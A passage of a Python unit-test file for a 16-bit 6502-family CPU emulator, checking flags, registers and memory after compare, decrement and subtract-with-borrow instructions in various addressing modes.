def test_cmp_imm_clears_zero_sets_carry_takes_neg_if_less_signed(self):
"""Comparison: A < #nn (signed), A negative"""
mpu = self._make_mpu()
# $0000 CMP #$0001, A will be -1 (0xFFFF)
self._write(mpu.memory, 0x0000, (0xC9, 0x01, 0x00))
mpu.a = 0xFFFF
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE) # 0xFFFF-0x0001=0xFFFE
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY) # A>m unsigned
def test_cmp_imm_clears_zero_carry_takes_neg_if_less_signed_nega(self):
"""Comparison: A < m (signed), A and m both negative"""
mpu = self._make_mpu()
# $0000 CMP #$FFFF (-1), A will be -2 (0xFFFE)
self._write(mpu.memory, 0x0000, (0xC9, 0xFF, 0xFF))
mpu.a = 0xFFFE
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE) # 0xFFFE-0xFFFF=0xFFFF
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.CARRY) # A<m unsigned
def test_cmp_imm_clears_zero_sets_carry_takes_neg_if_more_unsigned(self):
"""Comparison: A > m (unsigned)"""
mpu = self._make_mpu()
# $0000 CMP #$0001, A will be 10
self._write(mpu.memory, 0x0000, (0xC9, 0x01, 0x00))
mpu.a = 10
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0, mpu.p & mpu.NEGATIVE) # 0x0A-0x01 = 0x09
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY) # A>m unsigned
def test_cmp_imm_clears_zero_carry_takes_neg_if_more_signed(self):
"""Comparison: A > m (signed), memory negative"""
mpu = self._make_mpu()
# $0000 CMP #$FFFF (-1), A will be 2
self._write(mpu.memory, 0x0000, (0xC9, 0xFF, 0xFF))
mpu.a = 2
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0, mpu.p & mpu.NEGATIVE) # 0x0002-0xFFFF=0x0003
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.CARRY) # A<m unsigned
def test_cmp_imm_clears_zero_carry_takes_neg_if_more_signed_nega(self):
"""Comparison: A > m (signed), A and m both negative"""
mpu = self._make_mpu()
# $0000 CMP #$FFFE (-2), A will be -1 (0xFFFF)
self._write(mpu.memory, 0x0000, (0xC9, 0xFE, 0xFF))
mpu.a = 0xFFFF
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0, mpu.p & mpu.NEGATIVE) # 0xFFFF-0xFFFE=0x0001
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY) # A>m unsigned
# CMP Direct Page, Indirect
def test_cmp_dpi_sets_z_flag_if_equal(self):
mpu = self._make_mpu()
mpu.a = 0x42FF
# $0000 CMP ($10)
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0xd2, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xFF, 0x42))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(5, mpu.processorCycles)
self.assertEqual(0x42FF, mpu.a)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_cmp_dpi_resets_z_flag_if_unequal(self):
mpu = self._make_mpu()
mpu.a = 0x43FF
# $0000 CMP ($10)
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0xd2, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xFF, 0x42))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(5, mpu.processorCycles)
self.assertEqual(0x43FF, mpu.a)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
# CPX Immediate
def test_cpx_imm_sets_zero_carry_clears_neg_flags_if_equal(self):
"""Comparison: X == m"""
mpu = self._make_mpu()
# $0000 CPX #$20ff
self._write(mpu.memory, 0x0000, (0xE0, 0xff, 0x20))
mpu.x = 0x20ff
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
# CPY Immediate
def test_cpy_imm_sets_zero_carry_clears_neg_flags_if_equal(self):
"""Comparison: Y == m"""
mpu = self._make_mpu()
# $0000 CPY #$30ff
self._write(mpu.memory, 0x0000, (0xC0, 0xff, 0x30))
mpu.y = 0x30ff
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
# DEC Absolute
def test_dec_abs_decrements_memory(self):
mpu = self._make_mpu()
# $0000 DEC 0xABCD
self._write(mpu.memory, 0x0000, (0xCE, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x10, 0x10))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x0F, mpu.memory[0xABCD])
self.assertEqual(0x10, mpu.memory[0xABCD+1])
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_dec_abs_below_00_rolls_over_and_sets_negative_flag(self):
mpu = self._make_mpu()
# $0000 DEC 0xABCD
self._write(mpu.memory, 0x0000, (0xCE, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xFF, mpu.memory[0xABCD])
self.assertEqual(0xFF, mpu.memory[0xABCD+1])
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
def test_dec_abs_sets_zero_flag_when_decrementing_to_zero(self):
mpu = self._make_mpu()
# $0000 DEC 0xABCD
self._write(mpu.memory, 0x0000, (0xCE, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.memory[0xABCD])
self.assertEqual(0x00, mpu.memory[0xABCD+1])
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
# DEC Accumulator
def test_dec_a_decreases_a(self):
mpu = self._make_mpu()
# $0000 DEC
self._write(mpu.memory, 0x0000, [0x3A])
mpu.a = 0x0148
mpu.step()
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0x0147, mpu.a)
def test_dec_a_sets_zero_flag(self):
mpu = self._make_mpu()
# $0000 DEC
self._write(mpu.memory, 0x0000, [0x3A])
mpu.a = 0x01
mpu.step()
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0x00, mpu.a)
def test_dec_a_wraps_at_zero(self):
mpu = self._make_mpu()
# $0000 DEC
self._write(mpu.memory, 0x0000, [0x3A])
mpu.a = 0x00
mpu.step()
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0xFFFF, mpu.a)
# DEC Direct Page
def test_dec_dp_decrements_memory(self):
mpu = self._make_mpu()
# $0000 DEC 0x0010
self._write(mpu.memory, 0x0000, (0xC6, 0x10))
self._write(mpu.memory, 0x0010, (0x10, 0x10))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x0F, mpu.memory[0x0010])
self.assertEqual(0x10, mpu.memory[0x0010+1])
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_dec_dp_below_00_rolls_over_and_sets_negative_flag(self):
mpu = self._make_mpu()
# $0000 DEC 0x0010
self._write(mpu.memory, 0x0000, (0xC6, 0x10))
self._write(mpu.memory, 0x0010, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0xFF, mpu.memory[0x0010])
self.assertEqual(0xFF, mpu.memory[0x0010+1])
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
def test_dec_dp_sets_zero_flag_when_decrementing_to_zero(self):
mpu = self._make_mpu()
# $0000 DEC 0x0010
self._write(mpu.memory, 0x0000, (0xC6, 0x10))
self._write(mpu.memory, 0x0010, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.memory[0x0010])
self.assertEqual(0x00, mpu.memory[0x0010+1])
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
# DEC Absolute, X-Indexed
def test_dec_abs_x_decrements_memory(self):
mpu = self._make_mpu()
# $0000 DEC 0xABCD,X
self._write(mpu.memory, 0x0000, (0xDE, 0xCD, 0xAB))
mpu.x = 0x03
self._write(mpu.memory, 0xABCD + mpu.x, (0x10, 0x10))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x0F, mpu.memory[0xABCD + mpu.x])
self.assertEqual(0x10, mpu.memory[0xABCD + 1 + mpu.x])
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_dec_abs_x_below_00_rolls_over_and_sets_negative_flag(self):
mpu = self._make_mpu()
# $0000 DEC 0xABCD,X
self._write(mpu.memory, 0x0000, (0xDE, 0xCD, 0xAB))
mpu.x = 0x03
self._write(mpu.memory, 0xABCD + mpu.x, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xFF, mpu.memory[0xABCD + mpu.x])
self.assertEqual(0xFF, mpu.memory[0xABCD + 1 + mpu.x])
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
def test_dec_abs_x_sets_zero_flag_when_decrementing_to_zero(self):
mpu = self._make_mpu()
# $0000 DEC 0xABCD,X
self._write(mpu.memory, 0x0000, (0xDE, 0xCD, 0xAB))
mpu.x = 0x03
self._write(mpu.memory, 0xABCD + mpu.x, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.memory[0xABCD + mpu.x])
self.assertEqual(0x00, mpu.memory[0xABCD + 1 + mpu.x])
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
# DEC Direct Page, X-Indexed
def test_dec_dp_x_decrements_memory(self):
mpu = self._make_mpu()
# $0000 DEC 0x0010,X
self._write(mpu.memory, 0x0000, (0xD6, 0x10))
mpu.x = 0x03
self._write(mpu.memory, 0x0010 + mpu.x, (0x10, 0x10))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x0F, mpu.memory[0x0010 + mpu.x])
self.assertEqual(0x10, mpu.memory[0x0010 + 1 + mpu.x])
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_dec_dp_x_below_00_rolls_over_and_sets_negative_flag(self):
mpu = self._make_mpu()
# $0000 DEC 0x0010,X
self._write(mpu.memory, 0x0000, (0xD6, 0x10))
mpu.x = 0x03
self._write(mpu.memory, 0x0010 + mpu.x, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0xFF, mpu.memory[0x0010 + mpu.x])
self.assertEqual(0xFF, mpu.memory[0x0010 + 1 + mpu.x])
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
def test_dec_dp_x_sets_zero_flag_when_decrementing_to_zero(self):
mpu = self._make_mpu()
# $0000 DEC 0x0010,X
self._write(mpu.memory, 0x0000, (0xD6, 0x10))
mpu.x = 0x03
self._write(mpu.memory, 0x0010 + mpu.x, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.memory[0x0010 + mpu.x])
self.assertEqual(0x00, mpu.memory[0x0010 + 1 + mpu.x])
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
# DEX
def test_dex_decrements_x(self):
mpu = self._make_mpu()
mpu.x = 0x110
# $0000 DEX
mpu.memory[0x0000] = 0xCA
mpu.step()
self.assertEqual(0x0001, mpu.pc)
self.assertEqual(0x10F, mpu.x)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_dex_below_00_rolls_over_and_sets_negative_flag(self):
mpu = self._make_mpu()
mpu.x = 0x00
# $0000 DEX
mpu.memory[0x0000] = 0xCA
mpu.step()
self.assertEqual(0x0001, mpu.pc)
self.assertEqual(0xFFFF, mpu.x)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_dex_sets_zero_flag_when_decrementing_to_zero(self):
mpu = self._make_mpu()
mpu.x = 0x01
# $0000 DEX
mpu.memory[0x0000] = 0xCA
mpu.step()
self.assertEqual(0x0001, mpu.pc)
self.assertEqual(0x0000, mpu.x)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
# DEY
def test_dey_decrements_y(self):
mpu = self._make_mpu()
mpu.y = 0x110
# $0000 DEY
mpu.memory[0x0000] = 0x88
mpu.step()
self.assertEqual(0x0001, mpu.pc)
self.assertEqual(0x10F, mpu.y)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_dey_below_00_rolls_over_and_sets_negative_flag(self):
mpu = self._make_mpu()
mpu.y = 0x00
# $0000 DEY
mpu.memory[0x0000] = 0x88
mpu.step()
self.assertEqual(0x0001, mpu.pc)
self.assertEqual(0xFFFF, mpu.y)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
def test_dey_sets_zero_flag_when_decrementing_to_zero(self):
mpu = self._make_mpu()
mpu.y = 0x01
# $0000 DEY
mpu.memory[0x0000] = 0x88
mpu.step()
self.assertEqual(0x0001, mpu.pc)
self.assertEqual(0x0000, mpu.y)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
# *** TODO: it probably makes sense to move the relevant values into the high byte (or both bytes), since the low byte is already covered by the 8-bit tests ***
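# The "# borrow = 0" / "# borrow = 1" comments in the SBC tests below use
# the 6502-family convention that carry is the inverse of borrow, i.e.
# SBC computes A - m - (1 - C) and leaves carry set when no borrow was
# needed. A minimal, non-normative sketch for the 16-bit width assumed
# here, binary mode only (the helper name is illustrative only and is
# not part of the emulator's API):
def _sbc_sketch(self, a, m, carry_in):
    """Return (result, carry_out) for a 16-bit binary-mode SBC."""
    total = a - m - (1 - carry_in)
    carry_out = 1 if total >= 0 else 0   # carry stays set when no borrow
    return total & 0xFFFF, carry_out
# e.g. _sbc_sketch(0x07, 0x02, 0) returns (0x0004, 1), matching the
# "downto_four_with_borrow" tests below.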
# SBC Absolute
def test_sbc_abs_all_zeros_and_no_borrow_is_zero(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x00
# $0000 SBC $ABCD
self._write(mpu.memory, 0x0000, (0xED, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x00, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_abs_downto_zero_no_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x01
# $0000 SBC $ABCD
self._write(mpu.memory, 0x0000, (0xED, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x01, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_abs_downto_zero_with_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x01
# $0000 SBC $ABCD
self._write(mpu.memory, 0x0000, (0xED, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x00, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_abs_downto_four_with_borrow_clears_z_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x07
# $0000 SBC $ABCD
self._write(mpu.memory, 0x0000, (0xED, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x02, 0x00))
mpu.step()
self.assertEqual(0x04, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
# SBC Absolute, X-Indexed
def test_sbc_abs_x_all_zeros_and_no_borrow_is_zero(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x00
# $0000 SBC $FEE0,X
self._write(mpu.memory, 0x0000, (0xFD, 0xE0, 0xFE))
mpu.x = 0x0D
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_abs_x_downto_zero_no_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x01
# $0000 SBC $FEE0,X
self._write(mpu.memory, 0x0000, (0xFD, 0xE0, 0xFE))
mpu.x = 0x0D
self._write(mpu.memory, 0xFEED, (0x01, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_abs_x_downto_zero_with_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x01
# $0000 SBC $FEE0,X
self._write(mpu.memory, 0x0000, (0xFD, 0xE0, 0xFE))
mpu.x = 0x0D
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_abs_x_downto_four_with_borrow_clears_z_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x07
# $0000 SBC $FEE0,X
self._write(mpu.memory, 0x0000, (0xFD, 0xE0, 0xFE))
mpu.x = 0x0D
self._write(mpu.memory, 0xFEED, (0x02, 0x00))
mpu.step()
self.assertEqual(0x04, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
# SBC Absolute, Y-Indexed
def test_sbc_abs_y_all_zeros_and_no_borrow_is_zero(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x00
# $0000 SBC $FEE0,Y
self._write(mpu.memory, 0x0000, (0xF9, 0xE0, 0xFE))
mpu.y = 0x0D
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_abs_y_downto_zero_no_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x01
# $0000 SBC $FEE0,Y
self._write(mpu.memory, 0x0000, (0xF9, 0xE0, 0xFE))
mpu.y = 0x0D
self._write(mpu.memory, 0xFEED, (0x01, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_abs_y_downto_zero_with_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x01
# $0000 SBC $FEE0,Y
self._write(mpu.memory, 0x0000, (0xF9, 0xE0, 0xFE))
mpu.y = 0x0D
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_abs_y_downto_four_with_borrow_clears_z_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x07
# $0000 SBC $FEE0,Y
self._write(mpu.memory, 0x0000, (0xF9, 0xE0, 0xFE))
mpu.y = 0x0D
self._write(mpu.memory, 0xFEED, (0x02, 0x00))
mpu.step()
self.assertEqual(0x04, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
# SBC Direct Page
def test_sbc_dp_all_zeros_and_no_borrow_is_zero(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x00
# $0000 SBC $10
self._write(mpu.memory, 0x0000, (0xE5, 0x10))
self._write(mpu.memory, 0x0010, (0x00, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_dp_downto_zero_no_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x01
# $0000 SBC $10
self._write(mpu.memory, 0x0000, (0xE5, 0x10))
self._write(mpu.memory, 0x0010, (0x01, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_dp_downto_zero_with_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x01
# $0000 SBC $10
self._write(mpu.memory, 0x0000, (0xE5, 0x10))
self._write(mpu.memory, 0x0010, (0x00, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_dp_downto_four_with_borrow_clears_z_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x07
# $0000 SBC $10
self._write(mpu.memory, 0x0000, (0xE5, 0x10))
self._write(mpu.memory, 0x0010, (0x02, 0x00))
mpu.step()
self.assertEqual(0x04, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
# SBC Direct Page, X-Indexed
def test_sbc_dp_x_all_zeros_and_no_borrow_is_zero(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x00
# $0000 SBC $10,X
self._write(mpu.memory, 0x0000, (0xF5, 0x10))
mpu.x = 0x0D
self._write(mpu.memory, 0x001D, (0x00, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_dp_x_downto_zero_no_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x01
# $0000 SBC $10,X
self._write(mpu.memory, 0x0000, (0xF5, 0x10))
mpu.x = 0x0D
self._write(mpu.memory, 0x001D, (0x01, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_dp_x_downto_zero_with_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x01
# $0000 SBC $10,X
self._write(mpu.memory, 0x0000, (0xF5, 0x10))
mpu.x = 0x0D
self._write(mpu.memory, 0x001D, (0x00, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_dp_x_downto_four_with_borrow_clears_z_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x07
# $0000 SBC $10,X
self._write(mpu.memory, 0x0000, (0xF5, 0x10))
mpu.x = 0x0D
self._write(mpu.memory, 0x001D, (0x02, 0x00))
mpu.step()
self.assertEqual(0x04, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
# SBC Direct Page Indirect, Indexed (X)
def test_sbc_ind_x_all_zeros_and_no_borrow_is_zero(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x00
# $0000 SBC ($10,X)
# $0013 Vector to $FEED
self._write(mpu.memory, 0x0000, (0xE1, 0x10))
self._write(mpu.memory, 0x0013, (0xED, 0xFE))
mpu.x = 0x03
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_ind_x_downto_zero_no_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x01
# $0000 SBC ($10,X)
# $0013 Vector to $FEED
self._write(mpu.memory, 0x0000, (0xE1, 0x10))
self._write(mpu.memory, 0x0013, (0xED, 0xFE))
mpu.x = 0x03
self._write(mpu.memory, 0xFEED, (0x01, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_ind_x_downto_zero_with_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x01
# $0000 SBC ($10,X)
